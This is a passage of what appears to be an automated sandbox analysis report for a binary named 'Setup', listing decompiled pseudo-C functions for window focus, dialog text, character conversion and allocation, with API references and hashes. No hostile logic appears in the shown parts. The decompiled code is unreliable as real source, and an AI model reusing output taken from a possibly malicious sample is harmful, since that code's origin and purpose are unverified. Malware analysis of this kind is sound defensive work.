                                                                                                                                                              0x0040bf93
                                                                                                                                                              0x0040bfb1
                                                                                                                                                              0x0040bfb6
                                                                                                                                                              0x0040bfb8
                                                                                                                                                              0x0040bfca
                                                                                                                                                              0x0040bfca
                                                                                                                                                              0x0040bf95
                                                                                                                                                              0x0040bf9c
                                                                                                                                                              0x0040bf9c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bf93
                                                                                                                                                              0x0040beda
                                                                                                                                                              0x0040bee5
                                                                                                                                                              0x0040bee8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bef1
                                                                                                                                                              0x0040bef6
                                                                                                                                                              0x0040bf0a
                                                                                                                                                              0x0040bf26
                                                                                                                                                              0x0040bf37
                                                                                                                                                              0x0040bf44
                                                                                                                                                              0x0040bf73
                                                                                                                                                              0x0040bf73
                                                                                                                                                              0x0040bf75
                                                                                                                                                              0x0040bf7f
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • SetFocus.USER32(?,00000000,DDD124F9,00000000,00000000,?,DDD124F9), ref: 0040BF9C
                                                                                                                                                              • GetFocus.USER32 ref: 0040BFA4
                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 0040BFC3
                                                                                                                                                              • SetFocus.USER32(00000000), ref: 0040BFCA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Focus$Window
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3286522332-0
                                                                                                                                                              • Opcode ID: 970ddb0cfd7bd0c14a3f2e369824521eca09491f84e662d54869847b4cf92b83
                                                                                                                                                              • Instruction ID: 3a94e24fefa496a51dce265a90df239404a5a80031a59ee7eb99bbd9718925be
                                                                                                                                                              • Opcode Fuzzy Hash: 970ddb0cfd7bd0c14a3f2e369824521eca09491f84e662d54869847b4cf92b83
                                                                                                                                                              • Instruction Fuzzy Hash: 5A414BB4A001069FDB08DF99D991BBFB3B5FF49300F108169E516AB391DB34AD00CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0049C540 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                              			E0049C540(intOrPtr __ecx, void* __edx, struct HWND__* _a4, int _a8, intOrPtr _a12, struct HWND__* _a16, int _a20, intOrPtr _a24) {
				long _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed char _v25;
				signed int _v32;
				char _v60;
				char _v64;
				struct HWND__* _v68;
				char _v73;
				long _v80;
				long _v84;
				int _v88;
				intOrPtr _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				signed int _t46;
				signed int _t53;
				WCHAR* _t58;
				long _t61;
				intOrPtr _t69;
				intOrPtr _t92;
				intOrPtr _t94;
				signed int _t95;
				void* _t96;

				_push(0xffffffff);
				_push(0x50b21a);
				_push( *[fs:0x0]);
				_push(__ecx);
				_t45 =  *0x561244; // 0xddd124f9
				_t46 = _t45 ^ _t95;
				_v32 = _t46;
				_push(_t46);
				 *[fs:0x0] =  &_v16;
				_v20 = _t96 - 0x4c;
				_v96 = __ecx;
				_v24 = 0xffffffff;
				_v8 = 0;
				E004175C0(E00434050( &_v73));
				_v8 = 1;
				if(_a8 != 0xffffffff) {
					_v68 = GetDlgItem(_a4, _a8);
				} else {
					_v68 = _a4;
				}
				if(_v68 != 0) {
					_t89 = _a16;
					_t53 = E0049C190(_v96, _a16, _a12, _a16,  &_v64, 0, _a24);
					asm("sbb eax, eax");
					_v25 =  ~( ~_t53);
					if((_v25 & 0x000000ff) != 0) {
						if(_a20 == 0) {
							SendMessageW(_v68, 0x30, E0042E0E0(0x5c1160), 0);
						} else {
							SendMessageW(_v68, 0x30, _a20, 0);
						}
						_t58 = E00416A30( &_v60);
						_t89 = _v68;
						_v88 = SetWindowTextW(_v68, _t58);
						_v8 = 0;
						E004176E0();
						_t61 = _v88;
					} else {
						_v84 = 0;
						_v8 = 0;
						E004176E0();
						_t61 = _v84;
					}
				} else {
					_v80 = 0;
					_v8 = 0;
					E004176E0();
					_t61 = _v80;
				}
				 *[fs:0x0] = _v16;
				_pop(_t92);
				_pop(_t94);
				_pop(_t69);
				return E0044F6C8(_t61, _t69, _v32 ^ _t95, _t89, _t92, _t94);
			}






























                                                                                                                                                              0x0049c543
                                                                                                                                                              0x0049c545
                                                                                                                                                              0x0049c550
                                                                                                                                                              0x0049c551
                                                                                                                                                              0x0049c555
                                                                                                                                                              0x0049c55a
                                                                                                                                                              0x0049c55c
                                                                                                                                                              0x0049c562
                                                                                                                                                              0x0049c566
                                                                                                                                                              0x0049c56c
                                                                                                                                                              0x0049c56f
                                                                                                                                                              0x0049c572
                                                                                                                                                              0x0049c579
                                                                                                                                                              0x0049c58c
                                                                                                                                                              0x0049c591
                                                                                                                                                              0x0049c599
                                                                                                                                                              0x0049c5b1
                                                                                                                                                              0x0049c59b
                                                                                                                                                              0x0049c59e
                                                                                                                                                              0x0049c59e
                                                                                                                                                              0x0049c5b8
                                                                                                                                                              0x0049c5df
                                                                                                                                                              0x0049c5ea
                                                                                                                                                              0x0049c5f1
                                                                                                                                                              0x0049c5f5
                                                                                                                                                              0x0049c5fe
                                                                                                                                                              0x0049c61f
                                                                                                                                                              0x0049c648
                                                                                                                                                              0x0049c621
                                                                                                                                                              0x0049c62d
                                                                                                                                                              0x0049c62d
                                                                                                                                                              0x0049c651
                                                                                                                                                              0x0049c657
                                                                                                                                                              0x0049c661
                                                                                                                                                              0x0049c664
                                                                                                                                                              0x0049c66b
                                                                                                                                                              0x0049c670
                                                                                                                                                              0x0049c600
                                                                                                                                                              0x0049c600
                                                                                                                                                              0x0049c607
                                                                                                                                                              0x0049c60e
                                                                                                                                                              0x0049c613
                                                                                                                                                              0x0049c613
                                                                                                                                                              0x0049c5ba
                                                                                                                                                              0x0049c5ba
                                                                                                                                                              0x0049c5c1
                                                                                                                                                              0x0049c5c8
                                                                                                                                                              0x0049c5cd
                                                                                                                                                              0x0049c5cd
                                                                                                                                                              0x0049c6d5
                                                                                                                                                              0x0049c6dd
                                                                                                                                                              0x0049c6de
                                                                                                                                                              0x0049c6df
                                                                                                                                                              0x0049c6ed

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 0049C5AB
                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0049C62D
                                                                                                                                                              • SetWindowTextW.USER32(00000000,00000000), ref: 0049C65B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemMessageSendTextWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1298124448-0
                                                                                                                                                              • Opcode ID: 4d35edf563f70e0af3eef84d4ba23a6c57d4ed4c1c8e931ed56335222567eb40
                                                                                                                                                              • Instruction ID: 338f5d2a9ba86dcfa8496b688ed2e06dce44ce7ba2f11e37412eb35ce0c1dd2d
                                                                                                                                                              • Opcode Fuzzy Hash: 4d35edf563f70e0af3eef84d4ba23a6c57d4ed4c1c8e931ed56335222567eb40
                                                                                                                                                              • Instruction Fuzzy Hash: 87415D70904249EFDF04DFA9D895BEEBBB4EB14314F10812EF412A7281DB785D05CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00465D42 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00465D42(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00451A3C( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00460ACA( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00454477(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                              0x00465d4c
                                                                                                                                                              0x00465d53
                                                                                                                                                              0x00465d6a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465d5a
                                                                                                                                                              0x00465d5c
                                                                                                                                                              0x00465d76
                                                                                                                                                              0x00465d7b
                                                                                                                                                              0x00465d7e
                                                                                                                                                              0x00465d81
                                                                                                                                                              0x00465daa
                                                                                                                                                              0x00465db1
                                                                                                                                                              0x00465db3
                                                                                                                                                              0x00465e34
                                                                                                                                                              0x00465e4f
                                                                                                                                                              0x00465e51
                                                                                                                                                              0x00465d91
                                                                                                                                                              0x00465d91
                                                                                                                                                              0x00465d94
                                                                                                                                                              0x00465d96
                                                                                                                                                              0x00465d99
                                                                                                                                                              0x00465d99
                                                                                                                                                              0x00465d99
                                                                                                                                                              0x00465d99
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465d9f
                                                                                                                                                              0x00465e13
                                                                                                                                                              0x00465e13
                                                                                                                                                              0x00465e18
                                                                                                                                                              0x00465e1e
                                                                                                                                                              0x00465e21
                                                                                                                                                              0x00465e23
                                                                                                                                                              0x00465e26
                                                                                                                                                              0x00465e26
                                                                                                                                                              0x00465e26
                                                                                                                                                              0x00465e26
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465e2a
                                                                                                                                                              0x00465db5
                                                                                                                                                              0x00465db8
                                                                                                                                                              0x00465dbe
                                                                                                                                                              0x00465dc1
                                                                                                                                                              0x00465de8
                                                                                                                                                              0x00465deb
                                                                                                                                                              0x00465df1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465df3
                                                                                                                                                              0x00465df6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465df8
                                                                                                                                                              0x00465df8
                                                                                                                                                              0x00465dfe
                                                                                                                                                              0x00465e01
                                                                                                                                                              0x00465d6f
                                                                                                                                                              0x00465d6f
                                                                                                                                                              0x00465e0a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465e0a
                                                                                                                                                              0x00465dc3
                                                                                                                                                              0x00465dc6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465dca
                                                                                                                                                              0x00465ddb
                                                                                                                                                              0x00465de1
                                                                                                                                                              0x00465de3
                                                                                                                                                              0x00465de6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465de6
                                                                                                                                                              0x00465d83
                                                                                                                                                              0x00465d86
                                                                                                                                                              0x00465d88
                                                                                                                                                              0x00465d8e
                                                                                                                                                              0x00465d8e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465d5e
                                                                                                                                                              0x00465d5e
                                                                                                                                                              0x00465d63
                                                                                                                                                              0x00465d67
                                                                                                                                                              0x00465d67
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00465d63
                                                                                                                                                              0x00465d5c

                                                                                                                                                              APIs
                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00465D76
                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00465DAA
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00451924,?,00000000,00000000,?,?,?,?,00451924,00000000,?), ref: 00465DDB
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00451924,00000001,00000000,00000000,?,?,?,?,00451924,00000000,?), ref: 00465E49
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                              • Opcode ID: 842950bc1bb2c9001aa3cd0f0948e4b1baaeb719dfad5a9d203bdd58c7e87718
                                                                                                                                                              • Instruction ID: 52dea748093019666df3ed059cbaa69503571aede2bbebb0e5ff6efe3d2f1e32
                                                                                                                                                              • Opcode Fuzzy Hash: 842950bc1bb2c9001aa3cd0f0948e4b1baaeb719dfad5a9d203bdd58c7e87718
                                                                                                                                                              • Instruction Fuzzy Hash: 4531A031A00656EFDF20DF64C888ABE3BB5EF01311F18856AE4A18B2E1E335DD51DB56
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041E630 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E0041E630(void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				void* __ecx;
				signed int _t30;
				intOrPtr _t49;
				signed int _t72;
				void* _t73;

				_push(0xffffffff);
				_push(0x513830);
				_push( *[fs:0x0]);
				_push(_t49);
				_t30 =  *0x561244; // 0xddd124f9
				_push(_t30 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_v20 = _t73 - 0x18;
				_v44 = _t49;
				_v28 = E0041E7D0(_v44 + 1, 1);
				_v24 = 0;
				_v8 = 0;
				_v32 = 0;
				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
				_v24 = _v24 + 1;
				_v36 = 0;
				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
				_v24 = _v24 + 1;
				_v40 = 0;
				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
				_v8 = 0xffffffff;
				 *((char*)(E0041D720(_v28))) = 1;
				 *((char*)(E0041CEF0(_v28))) = 0;
				 *[fs:0x0] = _v16;
				return _v28;
			}

















                                                                                                                                                              0x0041e633
                                                                                                                                                              0x0041e635
                                                                                                                                                              0x0041e640
                                                                                                                                                              0x0041e641
                                                                                                                                                              0x0041e648
                                                                                                                                                              0x0041e64f
                                                                                                                                                              0x0041e653
                                                                                                                                                              0x0041e659
                                                                                                                                                              0x0041e65c
                                                                                                                                                              0x0041e66c
                                                                                                                                                              0x0041e66f
                                                                                                                                                              0x0041e676
                                                                                                                                                              0x0041e67d
                                                                                                                                                              0x0041e69b
                                                                                                                                                              0x0041e6a6
                                                                                                                                                              0x0041e6a9
                                                                                                                                                              0x0041e6c7
                                                                                                                                                              0x0041e6d2
                                                                                                                                                              0x0041e6d5
                                                                                                                                                              0x0041e6f3
                                                                                                                                                              0x0041e75d
                                                                                                                                                              0x0041e770
                                                                                                                                                              0x0041e77f
                                                                                                                                                              0x0041e788
                                                                                                                                                              0x0041e796

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 8ce642c58801f047890592d3ad38a4102074216498c831a93635b213d1046d24
                                                                                                                                                              • Instruction ID: 3769a898c11e8c6f2bbe98c8fa6b9c4e404ce17e535a93d307b403eca069a5a8
                                                                                                                                                              • Opcode Fuzzy Hash: 8ce642c58801f047890592d3ad38a4102074216498c831a93635b213d1046d24
                                                                                                                                                              • Instruction Fuzzy Hash: E9315EB5D001089FDB04DF99C852BEFBBB9EF48318F14051EE505A7381D7396940CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0043A810 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E0043A810(void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				void* __ecx;
				signed int _t30;
				intOrPtr _t49;
				signed int _t72;
				void* _t73;

				_push(0xffffffff);
				_push(0x513490);
				_push( *[fs:0x0]);
				_push(_t49);
				_t30 =  *0x561244; // 0xddd124f9
				_push(_t30 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_v20 = _t73 - 0x18;
				_v44 = _t49;
				_v28 = E00433BF0(_v44 + 1, 1);
				_v24 = 0;
				_v8 = 0;
				_v32 = 0;
				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
				_v24 = _v24 + 1;
				_v36 = 0;
				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
				_v24 = _v24 + 1;
				_v40 = 0;
				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
				_v8 = 0xffffffff;
				 *((char*)(E00436BA0(_v28))) = 1;
				 *((char*)(E004271F0(_v28))) = 0;
				 *[fs:0x0] = _v16;
				return _v28;
			}

















                                                                                                                                                              0x0043a813
                                                                                                                                                              0x0043a815
                                                                                                                                                              0x0043a820
                                                                                                                                                              0x0043a821
                                                                                                                                                              0x0043a828
                                                                                                                                                              0x0043a82f
                                                                                                                                                              0x0043a833
                                                                                                                                                              0x0043a839
                                                                                                                                                              0x0043a83c
                                                                                                                                                              0x0043a84c
                                                                                                                                                              0x0043a84f
                                                                                                                                                              0x0043a856
                                                                                                                                                              0x0043a85d
                                                                                                                                                              0x0043a87b
                                                                                                                                                              0x0043a886
                                                                                                                                                              0x0043a889
                                                                                                                                                              0x0043a8a7
                                                                                                                                                              0x0043a8b2
                                                                                                                                                              0x0043a8b5
                                                                                                                                                              0x0043a8d3
                                                                                                                                                              0x0043a93d
                                                                                                                                                              0x0043a950
                                                                                                                                                              0x0043a95f
                                                                                                                                                              0x0043a968
                                                                                                                                                              0x0043a976

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 546a6a7146ac282cecb13664b6c39ebf8be5004f1d1b8b2efe67c34288c3041b
                                                                                                                                                              • Instruction ID: 267eeca0b7a615dd3572bc71c368de8326a6248929799914903cc305de613933
                                                                                                                                                              • Opcode Fuzzy Hash: 546a6a7146ac282cecb13664b6c39ebf8be5004f1d1b8b2efe67c34288c3041b
                                                                                                                                                              • Instruction Fuzzy Hash: 51315CB1D002099FDB04DF99D852BEFBBB8EF48318F14051EE505A7382D7396A40CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004218E0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E004218E0(void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				void* __ecx;
				signed int _t30;
				intOrPtr _t49;
				signed int _t72;
				void* _t73;

				_push(0xffffffff);
				_push(0x5137c0);
				_push( *[fs:0x0]);
				_push(_t49);
				_t30 =  *0x561244; // 0xddd124f9
				_push(_t30 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_v20 = _t73 - 0x18;
				_v44 = _t49;
				_v28 = E00422100(_v44 + 1, 1);
				_v24 = 0;
				_v8 = 0;
				_v32 = 0;
				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
				_v24 = _v24 + 1;
				_v36 = 0;
				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
				_v24 = _v24 + 1;
				_v40 = 0;
				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
				_v8 = 0xffffffff;
				 *((char*)(E00421D90(_v28))) = 1;
				 *((char*)(E004210A0(_v28))) = 0;
				 *[fs:0x0] = _v16;
				return _v28;
			}

















                                                                                                                                                              0x004218e3
                                                                                                                                                              0x004218e5
                                                                                                                                                              0x004218f0
                                                                                                                                                              0x004218f1
                                                                                                                                                              0x004218f8
                                                                                                                                                              0x004218ff
                                                                                                                                                              0x00421903
                                                                                                                                                              0x00421909
                                                                                                                                                              0x0042190c
                                                                                                                                                              0x0042191c
                                                                                                                                                              0x0042191f
                                                                                                                                                              0x00421926
                                                                                                                                                              0x0042192d
                                                                                                                                                              0x0042194b
                                                                                                                                                              0x00421956
                                                                                                                                                              0x00421959
                                                                                                                                                              0x00421977
                                                                                                                                                              0x00421982
                                                                                                                                                              0x00421985
                                                                                                                                                              0x004219a3
                                                                                                                                                              0x00421a0d
                                                                                                                                                              0x00421a20
                                                                                                                                                              0x00421a2f
                                                                                                                                                              0x00421a38
                                                                                                                                                              0x00421a46

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
